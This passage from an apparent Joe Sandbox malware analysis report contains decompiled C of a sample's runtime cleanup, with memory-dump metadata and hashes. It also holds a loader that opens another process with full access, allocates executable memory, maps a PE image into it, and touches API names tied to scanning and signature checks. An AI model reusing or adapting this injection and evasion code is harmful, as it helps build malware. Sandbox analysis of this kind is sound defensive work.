                    				 *0x329d7f0 = _t32;
                    				_t33 = _t32 - 1;
                    				_pop(_t67);
                    				 *0x329d7ec =  *_t67;
                    				if(_t33 != 0 && _t33 < 3) {
                    					 *((intOrPtr*)(_t67 + _t33 * 4))();
                    				}
                    				_push(_t67);
                    				_t68 =  *((intOrPtr*)(_t92 + 8));
                    				if(_t68 != 0) {
                    					 *_t68();
                    				}
                    				_pop(_t69);
                    				_t34 =  *(_t89 + 0xc);
                    				if(_t34 >= 3) {
                    					 *((intOrPtr*)(_t69 + _t34 * 4))();
                    				}
                    				if( *0x329b030 == 0) {
                    					 *0x329b038 = 1;
                    					asm("fnstcw word [0x3289024]");
                    				}
                    				if( *(_t89 + 0xc) != 1) {
                    					_push(_t60);
                    					_push(0x329d7c8);
                    					_push(0x329d7de);
                    					_push(_t89);
                    					if( *0x0329D7F0 != 0 ||  *0x329b048 == 0) {
                    						L16:
                    						if( *0x3289004 != 0) {
                    							E0326428C();
                    							E03264320(_t69);
                    							 *0x3289004 = 0;
                    						}
                    						L18:
                    						if( *((char*)(0x329d7f0)) == 2 &&  *0x3289000 == 0) {
                    							 *0x0329D7D4 = 0;
                    						}
                    						E03264090();
                    						if( *((char*)(0x329d7f0)) <= 1 ||  *0x3289000 != 0) {
                    							_t80 =  *0x0329D7D8;
                    							if( *0x0329D7D8 != 0) {
                    								E03265E00(_t80);
                    								_t90 =  *((intOrPtr*)(0x329d7d8));
                    								_t21 = _t90 + 0x10; // 0x3260000
                    								_t87 =  *_t21;
                    								_t22 = _t90 + 4; // 0x3260000
                    								if(_t87 !=  *_t22 && _t87 != 0) {
                    									FreeLibrary(_t87);
                    								}
                    							}
                    						}
                    						E03264068();
                    						if( *((char*)(0x329d7f0)) == 1) {
                    							 *0x0329D7EC();
                    						}
                    						if( *((char*)(0x329d7f0)) != 0) {
                    							E032642F0();
                    						}
                    						if( *0x329d7c8 == 0) {
                    							if( *0x329b028 != 0) {
                    								 *0x329b028();
                    							}
                    							_t42 =  *0x3289000; // 0x0
                    							ExitProcess(_t42);
                    						}
                    						memcpy(0x329d7c8,  *0x329d7c8, 0xb << 2);
                    						_t92 = _t92 + 0xc;
                    						goto L18;
                    					} else {
                    						do {
                    							 *0x329b048 = 0;
                    							 *((intOrPtr*)( *0x329b048))();
                    						} while ( *0x329b048 != 0);
                    						goto L16;
                    					}
                    				} else {
                    					_t55 = E032640F4(); // executed
                    					return _t55;
                    				}
                    			}





















                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f0bb1a4cabca619da3245d590000135c14024fddd36b07e92eaa38a65dfb12a9
                    • Instruction ID: 265b458d721248f02dca958faa323307480fc7504102dadd124950df32f01243
                    • Opcode Fuzzy Hash: f0bb1a4cabca619da3245d590000135c14024fddd36b07e92eaa38a65dfb12a9
                    • Instruction Fuzzy Hash: ED2142789142098FCB08EF2AF8886AA7BE0FF59710F54C09FE8588B358C73099C1DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 33591a1e6be6965d1e4461e1218a9e83778ff475ca519fc53ee5e284e9d0674f
                    • Instruction ID: c042ce6994acfac801e9a3e1fb6376691f8c61697add886be95e45deca699f1d
                    • Opcode Fuzzy Hash: 33591a1e6be6965d1e4461e1218a9e83778ff475ca519fc53ee5e284e9d0674f
                    • Instruction Fuzzy Hash: 08F02B726146069F9711EF4BED8085AFBECEF59B1035640BAE504C7A10D531AC91C650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.761893695.0000000003261000.00000020.00001000.00020000.00000000.sdmp, Offset: 03260000, based on PE: true
                    • Associated: 00000000.00000002.761886979.0000000003260000.00000002.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003289000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 00000000.00000002.761941452.0000000003393000.00000004.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3260000_r096teIe1H.jbxd
                    Similarity
                    • API ID: InetOffline
                    • String ID:
                    • API String ID: 3180263700-0
                    • Opcode ID: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
                    • Instruction ID: 701a6aa4e7112b57518088536733743828b23c4170f095d004f803390fbd3c3b
                    • Opcode Fuzzy Hash: bda40c73234dca3d881477a73093573e2fc81d7cefa59c78efb77cb5b2cee47e
                    • Instruction Fuzzy Hash: 8190022605470C051040B2953401D16724C1A5151058040225B191962259A564A160B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E0327A6F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                    				char _v5;
                    				void* _v12;
                    				short _v14;
                    				char _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v32;
                    				char _v36;
                    				intOrPtr _v40;
                    				char _v44;
                    				char _v48;
                    				char _v52;
                    				intOrPtr _v56;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				intOrPtr _v72;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				intOrPtr _v88;
                    				char _v92;
                    				char _v96;
                    				char _v100;
                    				intOrPtr _v104;
                    				char _v108;
                    				char _v112;
                    				char _v116;
                    				intOrPtr _v120;
                    				char _v124;
                    				char _v128;
                    				char _v132;
                    				intOrPtr _v136;
                    				char _v140;
                    				char _v144;
                    				char _v148;
                    				intOrPtr _v152;
                    				char _v156;
                    				char _v160;
                    				char _v164;
                    				intOrPtr _v168;
                    				char _v172;
                    				char _v176;
                    				char _v180;
                    				intOrPtr _v184;
                    				char _v188;
                    				char _v192;
                    				char _v196;
                    				intOrPtr _v200;
                    				char _v204;
                    				char _v208;
                    				char _v212;
                    				intOrPtr _v216;
                    				char _v220;
                    				char _v224;
                    				char _v228;
                    				intOrPtr _v232;
                    				char _v236;
                    				char _v240;
                    				char _v244;
                    				intOrPtr _v248;
                    				char _v252;
                    				char _v256;
                    				char _v260;
                    				intOrPtr _v264;
                    				char _v268;
                    				char _v272;
                    				char _v276;
                    				intOrPtr _v280;
                    				char _v284;
                    				char _v288;
                    				char _v292;
                    				intOrPtr _v296;
                    				char _v300;
                    				char _v304;
                    				char _v308;
                    				intOrPtr _v312;
                    				char _v316;
                    				char _v320;
                    				char _v324;
                    				intOrPtr _v328;
                    				char _v332;
                    				char _v336;
                    				char _v340;
                    				intOrPtr _v344;
                    				char _v348;
                    				char _v352;
                    				char _v356;
                    				intOrPtr _v360;
                    				char _v364;
                    				char _v368;
                    				char _v372;
                    				intOrPtr _v376;
                    				char _v380;
                    				char _v384;
                    				char _v388;
                    				intOrPtr _v392;
                    				char _v396;
                    				char _v400;
                    				char _v404;
                    				intOrPtr _v408;
                    				char _v412;
                    				char _v416;
                    				char _v420;
                    				intOrPtr _v424;
                    				char _v428;
                    				char _v432;
                    				char _v436;
                    				intOrPtr _v440;
                    				char _v444;
                    				char _v448;
                    				char _v452;
                    				intOrPtr _v456;
                    				char _v460;
                    				char _v464;
                    				char _v468;
                    				intOrPtr _v472;
                    				char _v476;
                    				char _v480;
                    				char _v484;
                    				intOrPtr _v488;
                    				char _v492;
                    				char _v496;
                    				char _v500;
                    				intOrPtr _v504;
                    				char _v508;
                    				char _v512;
                    				char _v516;
                    				intOrPtr _v520;
                    				char _v524;
                    				char _v528;
                    				char _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				char _v544;
                    				char _v548;
                    				intOrPtr _v552;
                    				char _v556;
                    				char _v560;
                    				char _v564;
                    				intOrPtr _v568;
                    				char _v572;
                    				char _v576;
                    				char _v580;
                    				intOrPtr _v584;
                    				char _v588;
                    				char _v592;
                    				char _v596;
                    				intOrPtr _v600;
                    				char _v604;
                    				char _v608;
                    				char _v612;
                    				intOrPtr _v616;
                    				char _v620;
                    				char _v624;
                    				char _v628;
                    				intOrPtr _v632;
                    				char _v636;
                    				char _v640;
                    				char _v644;
                    				intOrPtr _v648;
                    				char _v652;
                    				char _v656;
                    				char _v660;
                    				intOrPtr _v664;
                    				char _v668;
                    				char _v672;
                    				char _v676;
                    				intOrPtr _v680;
                    				char _v684;
                    				char _v688;
                    				char _v692;
                    				intOrPtr _v696;
                    				char _v700;
                    				char _v704;
                    				char _v708;
                    				intOrPtr _v712;
                    				char _v716;
                    				char _v720;
                    				char _v724;
                    				intOrPtr _v728;
                    				char _v732;
                    				char _v736;
                    				char _v740;
                    				intOrPtr _v744;
                    				char _v748;
                    				char _v752;
                    				char _v756;
                    				intOrPtr _v760;
                    				char _v764;
                    				char _v768;
                    				char _v772;
                    				intOrPtr _v776;
                    				char _v780;
                    				char _v784;
                    				char _v788;
                    				intOrPtr _v792;
                    				char _v796;
                    				char _v800;
                    				intOrPtr _t533;
                    				intOrPtr* _t535;
                    				intOrPtr _t536;
                    				intOrPtr _t539;
                    				intOrPtr _t540;
                    				void* _t681;
                    				void* _t735;
                    				intOrPtr _t745;
                    				intOrPtr _t746;
                    				intOrPtr _t748;
                    				intOrPtr _t793;
                    				intOrPtr _t880;
                    				intOrPtr _t881;
                    				signed short _t899;
                    				intOrPtr _t904;
                    				void* _t907;
                    				intOrPtr _t923;
                    				intOrPtr _t969;
                    				_Unknown_base(*)()* _t1059;
                    				intOrPtr _t1102;
                    				intOrPtr _t1103;
                    				intOrPtr _t1104;
                    				intOrPtr _t1105;
                    				_Unknown_base(*)()** _t1107;
                    				_Unknown_base(*)()* _t1125;
                    				intOrPtr _t1198;
                    				intOrPtr _t1199;
                    				_Unknown_base(*)()** _t1201;
                    				void* _t1218;
                    				intOrPtr _t1221;
                    				short _t1225;
                    				intOrPtr _t1226;
                    				intOrPtr _t1227;
                    				intOrPtr _t1228;
                    				intOrPtr _t1246;
                    				void* _t1250;
                    				intOrPtr _t1291;
                    				void* _t1321;
                    				void* _t1326;
                    				void* _t1331;
                    				void* _t1336;
                    				void* _t1341;
                    				void* _t1346;
                    				void* _t1351;
                    				void* _t1359;
                    				void* _t1364;
                    				void* _t1369;
                    				void* _t1374;
                    				void* _t1379;
                    				void* _t1392;
                    				void* _t1397;
                    				void* _t1402;
                    				intOrPtr _t1403;
                    				void* _t1411;
                    				void* _t1416;
                    				void* _t1421;
                    				signed int _t1425;
                    				void* _t1431;
                    				void* _t1436;
                    				void* _t1441;
                    				void* _t1446;
                    				void* _t1451;
                    				void* _t1456;
                    				void* _t1461;
                    				void* _t1466;
                    				void* _t1471;
                    				void* _t1476;
                    				void* _t1482;
                    				void* _t1487;
                    				void* _t1492;
                    				void* _t1497;
                    				void* _t1502;
                    				void* _t1507;
                    				void* _t1512;
                    				void* _t1517;
                    				void* _t1522;
                    				void* _t1527;
                    				_Unknown_base(*)()** _t1528;
                    				void* _t1533;
                    				void* _t1538;
                    				void* _t1543;
                    				void* _t1548;
                    				_Unknown_base(*)()** _t1549;
                    				void* _t1554;
                    				void* _t1559;
                    				void* _t1564;
                    				void* _t1569;
                    				void* _t1574;
                    				void* _t1579;
                    				intOrPtr _t1582;
                    				void* _t1589;
                    				void* _t1592;
                    				intOrPtr _t1596;
                    				intOrPtr _t1597;
                    				short _t1609;
                    				void* _t1612;
                    
                    				_t1596 = _t1597;
                    				_t1250 = 0x63;
                    				do {
                    					_push(0);
                    					_push(0);
                    					_t1250 = _t1250 - 1;
                    					_t1598 = _t1250;
                    				} while (_t1250 != 0);
                    				_push(_t1250);
                    				_push(_t1596);
                    				_push(0x327c06a);
                    				_push( *[fs:eax]);
                    				 *[fs:eax] = _t1597;
                    				E032644F4(0x329e544, 0x327c088);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v20, E03264964(_v24));
                    				_push(_v20);
                    				E032647B0( &_v32,  *0x329e544, 0x327c094);
                    				E03264698( &_v28, E03264964(_v32));
                    				_pop(_t1321);
                    				E03277C04(_v28,  *0x329e544, _t1321, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v36, E03264964(_v40));
                    				_push(_v36);
                    				E032647B0( &_v48,  *0x329e544, 0x327c094);
                    				E03264698( &_v44, E03264964(_v48));
                    				_pop(_t1326);
                    				E03277C04(_v44,  *0x329e544, _t1326, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v52, E03264964(_v56));
                    				_push(_v52);
                    				E032647B0( &_v64,  *0x329e544, 0x327c094);
                    				E03264698( &_v60, E03264964(_v64));
                    				_pop(_t1331);
                    				E03277C04(_v60,  *0x329e544, _t1331, _t1598);
                    				_v5 = 0;
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v68, E03264964(_v72));
                    				_push(_v68);
                    				E032647B0( &_v80,  *0x329e544, 0x327c094);
                    				E03264698( &_v76, E03264964(_v80));
                    				_pop(_t1336);
                    				E03277C04(_v76,  *0x329e544, _t1336, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v84, E03264964(_v88));
                    				_push(_v84);
                    				E032647B0( &_v96,  *0x329e544, 0x327c094);
                    				E03264698( &_v92, E03264964(_v96));
                    				_pop(_t1341);
                    				E03277C04(_v92,  *0x329e544, _t1341, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v100, E03264964(_v104));
                    				_push(_v100);
                    				E032647B0( &_v112,  *0x329e544, 0x327c094);
                    				E03264698( &_v108, E03264964(_v112));
                    				_pop(_t1346);
                    				E03277C04(_v108,  *0x329e544, _t1346, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v116, E03264964(_v120));
                    				_push(_v116);
                    				E032647B0( &_v128,  *0x329e544, 0x327c094);
                    				E03264698( &_v124, E03264964(_v128));
                    				_pop(_t1351);
                    				E03277C04(_v124,  *0x329e544, _t1351, _t1598);
                    				_t533 =  *0x329a798; // 0x329e324
                    				E03277AE4(_t533, 0, 0, 0, 0);
                    				_t535 =  *0x329a96c; // 0x329e33c
                    				 *_t535 = _a8;
                    				_t536 =  *0x329a96c; // 0x329e33c
                    				 *((intOrPtr*)(_t536 + 4)) = 0;
                    				 *0x329e510 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtOpenProcess");
                    				_t539 =  *0x329a96c; // 0x329e33c
                    				_t540 =  *0x329a798; // 0x329e324
                    				 *0x329e510(0x329e53c, 0x1f0fff, _t540, _t539);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v132, E03264964(_v136));
                    				_push(_v132);
                    				E032647B0( &_v144,  *0x329e544, 0x327c094);
                    				E03264698( &_v140, E03264964(_v144));
                    				_pop(_t1359);
                    				E03277C04(_v140,  *0x329e544, _t1359, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v148, E03264964(_v152));
                    				_push(_v148);
                    				E032647B0( &_v160,  *0x329e544, 0x327c094);
                    				E03264698( &_v156, E03264964(_v160));
                    				_pop(_t1364);
                    				E03277C04(_v156,  *0x329e544, _t1364, _t1598);
                    				E03262EE0();
                    				 *0x329e548 = (E03262F08(9) + 1) * 0x5f5e100;
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v164, E03264964(_v168));
                    				_push(_v164);
                    				E032647B0( &_v176,  *0x329e544, 0x327c094);
                    				E03264698( &_v172, E03264964(_v176));
                    				_pop(_t1369);
                    				E03277C04(_v172,  *0x329e544, _t1369, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("Initialize");
                    				E03264824();
                    				E03264698( &_v180, E03264964(_v184));
                    				_push(_v180);
                    				E032647B0( &_v192,  *0x329e544, 0x327c094);
                    				E03264698( &_v188, E03264964(_v192));
                    				_pop(_t1374);
                    				E03277C04(_v188,  *0x329e544, _t1374, _t1598);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanString");
                    				E03264824();
                    				E03264698( &_v196, E03264964(_v200));
                    				_push(_v196);
                    				E032647B0( &_v208,  *0x329e544, 0x327c094);
                    				E03264698( &_v204, E03264964(_v208));
                    				_pop(_t1379);
                    				E03277C04(_v204,  *0x329e544, _t1379, _t1598);
                    				_t1599 =  *0x329e53c;
                    				if( *0x329e53c == 0) {
                    					L21:
                    					E03277B14( *0x329e53c, "BCryptVerifySignature");
                    					E03277B14( *0x329e53c, "BCryptQueryProviderRegistration");
                    					E03277B14( *0x329e53c, "BCryptRegisterProvider");
                    					E03277B14( *0x329e53c, "NtReadVirtualMemory");
                    					E03277B14( *0x329e53c, "NtOpenObjectAuditAlarm");
                    					E03277B14( *0x329e53c, "I_QueryTagInformation");
                    					E03277B14( *0x329e53c, "NtSetSecurityObject");
                    					E03277B14( *0x329e53c, "NtOpenProcess");
                    					_push(0x327c094);
                    					_push( *0x329e544);
                    					_push("UacInitialize");
                    					E03264824();
                    					E03264698( &_v756, E03264964(_v760));
                    					_push(_v756);
                    					E032647B0( &_v768,  *0x329e544, 0x327c094);
                    					E03264698( &_v764, E03264964(_v768));
                    					_pop(_t1392);
                    					E03277C04(_v764,  *0x329e544, _t1392, _t1613);
                    					_push(0x327c094);
                    					_push( *0x329e544);
                    					_push("ScanString");
                    					E03264824();
                    					E03264698( &_v772, E03264964(_v776));
                    					_push(_v772);
                    					E032647B0( &_v784,  *0x329e544, 0x327c094);
                    					E03264698( &_v780, E03264964(_v784));
                    					_pop(_t1397);
                    					E03277C04(_v780,  *0x329e544, _t1397, _t1613);
                    					_push(0x327c094);
                    					_push( *0x329e544);
                    					_push("OpenSession");
                    					E03264824();
                    					E03264698( &_v788, E03264964(_v792));
                    					_push(_v788);
                    					E032647B0( &_v800,  *0x329e544, 0x327c094);
                    					E03264698( &_v796, E03264964(_v800));
                    					_pop(_t1402);
                    					E03277C04(_v796,  *0x329e544, _t1402, _t1613);
                    					_pop(_t1403);
                    					 *[fs:eax] = _t1403;
                    					_push(0x327c071);
                    					E032644C4( &_v800, 0x64);
                    					return E032644C4( &_v400, 0x60);
                    				}
                    				_t681 =  *((intOrPtr*)( *_a4))();
                    				 *0x329e530 = E032779BC(GetCurrentProcess(), 0, _t681, 0x3000, 0x40);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("ScanBuffer");
                    				E03264824();
                    				E03264698( &_v212, E03264964(_v216));
                    				_push(_v212);
                    				E032647B0( &_v224,  *0x329e544, 0x327c094);
                    				E03264698( &_v220, E03264964(_v224));
                    				_pop(_t1411);
                    				E03277C04(_v220,  *0x329e544, _t1411, _t1599);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("UacInitialize");
                    				E03264824();
                    				E03264698( &_v228, E03264964(_v232));
                    				_push(_v228);
                    				E032647B0( &_v240,  *0x329e544, 0x327c094);
                    				E03264698( &_v236, E03264964(_v240));
                    				_pop(_t1416);
                    				E03277C04(_v236,  *0x329e544, _t1416, _t1599);
                    				_push(0x327c094);
                    				_push( *0x329e544);
                    				_push("OpenSession");
                    				E03264824();
                    				E03264698( &_v244, E03264964(_v248));
                    				_push(_v244);
                    				E032647B0( &_v256,  *0x329e544, 0x327c094);
                    				E03264698( &_v252, E03264964(_v256));
                    				_pop(_t1421);
                    				E03277C04(_v252,  *0x329e544, _t1421, _t1599);
                    				if( *0x329e530 == 0) {
                    					goto L21;
                    				}
                    				E032758D8(_a4, 0, 0);
                    				 *((intOrPtr*)( *_a4))();
                    				 *((intOrPtr*)( *_a4 + 0xc))();
                    				_t1592 =  *0x329e530; // 0x0
                    				if(IsBadReadPtr(_t1592, 0x40) != 0 ||  *_t1592 != 0x5a4d) {
                    					L20:
                    					_push( *((intOrPtr*)( *_a4))(0x4000));
                    					_t735 =  *0x329e530; // 0x0
                    					_push(_t735);
                    					_push(GetCurrentProcess());
                    					L032779B4();
                    					goto L21;
                    				} else {
                    					_v12 =  *((intOrPtr*)(_t1592 + 0x3c)) +  *0x329e530;
                    					if(IsBadReadPtr(_v12, 0xf8) != 0 ||  *_v12 != 0x4550) {
                    						goto L20;
                    					} else {
                    						 *0x329e524 = _v12 + 0xf8;
                    						_t1425 =  *0x329e548; // 0x0
                    						 *0x329e52c = _t1425 -  *((intOrPtr*)(_v12 + 0x50));
                    						_t1605 =  *0x329e52c;
                    						if( *0x329e52c == 0) {
                    							L19:
                    							_push(0x4000);
                    							_t745 =  *0x329e52c; // 0x0
                    							_push(_t745);
                    							_t746 =  *0x329e534; // 0x0
                    							_push(_t746);
                    							_push(GetCurrentProcess());
                    							L032779B4();
                    							goto L20;
                    						}
                    						_t748 =  *0x329e52c; // 0x0
                    						 *0x329e534 = E032779BC(GetCurrentProcess(), 0, _t748, 0x3000, 0x40);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v260, E03264964(_v264));
                    						_push(_v260);
                    						E032647B0( &_v272,  *0x329e544, 0x327c094);
                    						E03264698( &_v268, E03264964(_v272));
                    						_pop(_t1431);
                    						E03277C04(_v268,  *0x329e544, _t1431, _t1605);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("UacInitialize");
                    						E03264824();
                    						E03264698( &_v276, E03264964(_v280));
                    						_push(_v276);
                    						E032647B0( &_v288,  *0x329e544, 0x327c094);
                    						E03264698( &_v284, E03264964(_v288));
                    						_pop(_t1436);
                    						E03277C04(_v284,  *0x329e544, _t1436, _t1605);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v292, E03264964(_v296));
                    						_push(_v292);
                    						E032647B0( &_v304,  *0x329e544, 0x327c094);
                    						E03264698( &_v300, E03264964(_v304));
                    						_pop(_t1441);
                    						E03277C04(_v300,  *0x329e544, _t1441, _t1605);
                    						_t1606 =  *0x329e534;
                    						if( *0x329e534 == 0) {
                    							goto L19;
                    						}
                    						_t793 =  *0x329e52c; // 0x0
                    						 *0x329e538 = E032779BC( *0x329e53c, 0, _t793, 0x3000, 0x40);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v308, E03264964(_v312));
                    						_push(_v308);
                    						E032647B0( &_v320,  *0x329e544, 0x327c094);
                    						E03264698( &_v316, E03264964(_v320));
                    						_pop(_t1446);
                    						E03277C04(_v316,  *0x329e544, _t1446, _t1606);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("UacInitialize");
                    						E03264824();
                    						E03264698( &_v324, E03264964(_v328));
                    						_push(_v324);
                    						E032647B0( &_v336,  *0x329e544, 0x327c094);
                    						E03264698( &_v332, E03264964(_v336));
                    						_pop(_t1451);
                    						E03277C04(_v332,  *0x329e544, _t1451, _t1606);
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("OpenSession");
                    						E03264824();
                    						E03264698( &_v340, E03264964(_v344));
                    						_push(_v340);
                    						E032647B0( &_v352,  *0x329e544, 0x327c094);
                    						E03264698( &_v348, E03264964(_v352));
                    						_pop(_t1456);
                    						E03277C04(_v348,  *0x329e544, _t1456, _t1606);
                    						_t1607 =  *0x329e538;
                    						if( *0x329e538 == 0) {
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v708, E03264964(_v712));
                    							_push(_v708);
                    							E032647B0( &_v720,  *0x329e544, 0x327c094);
                    							E03264698( &_v716, E03264964(_v720));
                    							_pop(_t1461);
                    							E03277C04(_v716,  *0x329e544, _t1461, __eflags);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanString");
                    							E03264824();
                    							E03264698( &_v724, E03264964(_v728));
                    							_push(_v724);
                    							E032647B0( &_v736,  *0x329e544, 0x327c094);
                    							E03264698( &_v732, E03264964(_v736));
                    							_pop(_t1466);
                    							E03277C04(_v732,  *0x329e544, _t1466, __eflags);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v740, E03264964(_v744));
                    							_push(_v740);
                    							E032647B0( &_v752,  *0x329e544, 0x327c094);
                    							E03264698( &_v748, E03264964(_v752));
                    							_pop(_t1471);
                    							E03277C04(_v748,  *0x329e544, _t1471, __eflags);
                    							_push(0x4000);
                    							_t880 =  *0x329e52c; // 0x0
                    							_push(_t880);
                    							_t881 =  *0x329e538; // 0x0
                    							_push(_t881);
                    							_push( *0x329e53c);
                    							L032779B4();
                    							goto L19;
                    						}
                    						_push(0x327c094);
                    						_push( *0x329e544);
                    						_push("ScanBuffer");
                    						E03264824();
                    						E03264698( &_v356, E03264964(_v360));
                    						_push(_v356);
                    						E032647B0( &_v368,  *0x329e544, 0x327c094);
                    						E03264698( &_v364, E03264964(_v368));
                    						_pop(_t1476);
                    						E03277C04(_v364,  *0x329e544, _t1476, _t1607);
                    						 *0x329e528 =  *(_v12 + 6) & 0x0000ffff;
                    						_t1291 =  *0x329e524; // 0x0
                    						_t899 =  *0x329e528; // 0x0
                    						_t904 =  *0x329e534; // 0x0
                    						E0327A580(_t904, _t1291 - _t1592 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + (_t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899 + _t899) * 4, _t1592);
                    						_t907 = ( *0x329e528 & 0x0000ffff) - 1;
                    						if(_t907 < 0) {
                    							L14:
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacScan");
                    							E03264824();
                    							E03264698( &_v388, E03264964(_v392));
                    							_push(_v388);
                    							E032647B0( &_v400,  *0x329e544, 0x327c094);
                    							E03264698( &_v396, E03264964(_v400));
                    							_pop(_t1482);
                    							E03277C04(_v396,  *0x329e544, _t1482, _t1610);
                    							_t923 =  *((intOrPtr*)(_v12 + 0xa0));
                    							if(_t923 != 0) {
                    								_t1582 =  *0x329e538; // 0x0
                    								_t1612 = _t923 +  *0x329e534;
                    								_t1221 =  *0x329e534; // 0x0
                    								E0327A4D0( *((intOrPtr*)(_v12 + 0x34)), _t1221, _t923 +  *0x329e534, _t1582,  *((intOrPtr*)(_v12 + 0xa4)));
                    							}
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v404, E03264964(_v408));
                    							_push(_v404);
                    							E032647B0( &_v416,  *0x329e544, 0x327c094);
                    							E03264698( &_v412, E03264964(_v416));
                    							_pop(_t1487);
                    							E03277C04(_v412,  *0x329e544, _t1487, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v420, E03264964(_v424));
                    							_push(_v420);
                    							E032647B0( &_v432,  *0x329e544, 0x327c094);
                    							E03264698( &_v428, E03264964(_v432));
                    							_pop(_t1492);
                    							E03277C04(_v428,  *0x329e544, _t1492, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
                    							E03264698( &_v436, E03264964(_v440));
                    							_push(_v436);
                    							E032647B0( &_v448,  *0x329e544, 0x327c094);
                    							E03264698( &_v444, E03264964(_v448));
                    							_pop(_t1497);
                    							E03277C04(_v444,  *0x329e544, _t1497, _t1612);
                    							_t969 =  *0x329e534; // 0x0
                    							E0327A58C(_t969,  *((intOrPtr*)(_v12 + 0x80)) +  *0x329e534);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("UacInitialize");
                    							E03264824();
                    							E03264698( &_v452, E03264964(_v456));
                    							_push(_v452);
                    							E032647B0( &_v464,  *0x329e544, 0x327c094);
                    							E03264698( &_v460, E03264964(_v464));
                    							_pop(_t1502);
                    							E03277C04(_v460,  *0x329e544, _t1502, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("OpenSession");
                    							E03264824();
                    							E03264698( &_v468, E03264964(_v472));
                    							_push(_v468);
                    							E032647B0( &_v480,  *0x329e544, 0x327c094);
                    							E03264698( &_v476, E03264964(_v480));
                    							_pop(_t1507);
                    							E03277C04(_v476,  *0x329e544, _t1507, _t1612);
                    							_push(0x327c094);
                    							_push( *0x329e544);
                    							_push("ScanBuffer");
                    							E03264824();
